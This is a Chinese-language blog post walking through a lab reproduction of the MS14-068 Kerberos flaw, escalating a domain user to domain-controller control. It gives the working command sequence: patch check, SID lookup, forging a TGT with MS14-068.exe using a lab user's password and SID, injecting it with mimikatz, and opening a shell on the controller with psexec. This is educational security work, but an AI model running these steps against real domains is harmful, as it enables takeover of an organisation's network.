【MS14-068漏洞复现】


前言

ms14-068漏洞主要通过伪造域控管理员的TGT,将普通用户权限提权为域控管理员权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。


一、环境介绍

在本地搭建的环境
win-7作为域成员主机 IP:10.40.2.10
win-2008作为域控 IP:10.40.2.20


二、MS14-068利用条件

1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
4、域控服务器的IP


三、利用步骤

1.查看域控是否打ms14-068漏洞补丁

使用systeminfo命令查看所打补丁,发现没有KB3011780,可以利用
在这里插入图片描述

2.获取域内用户的SID值

win-7登陆的域用户为zhangsan
使用whoami /all 命令查询SID
在这里插入图片描述

3.删除系统原有票据

klist查看当前缓存的票据
为了防止影响我们的操作,删除已有的票据 klist purge
在这里插入图片描述

4.生成票据

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u zhangsan@hp.com -p HEpeng20001023 -s S-1-5-21-567080702-4146164500-2918825418-1105 -d win-2008.hp.com
在这里插入图片描述
并且目录下生成了TGT_zhangsan@hp.com.ccache文件

5.导入票据

使用mimikatz工具
kerberos::ptc TGT_zhangsan@hp.com.ccache
在这里插入图片描述

6.连接域控主机

直接使用IP地址失败,使用主机名成功
在这里插入图片描述

7.使用psexec反弹shell

psexec.exe \win-2008.hp.com cmd
在这里插入图片描述
成功执行ipconfig命令查看到IP地址,为域控主机IP,漏洞利用成功


总结

本次实验介绍了ms14-068的利用过程,域渗透需要学习的地方还非常多,继续加油!

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值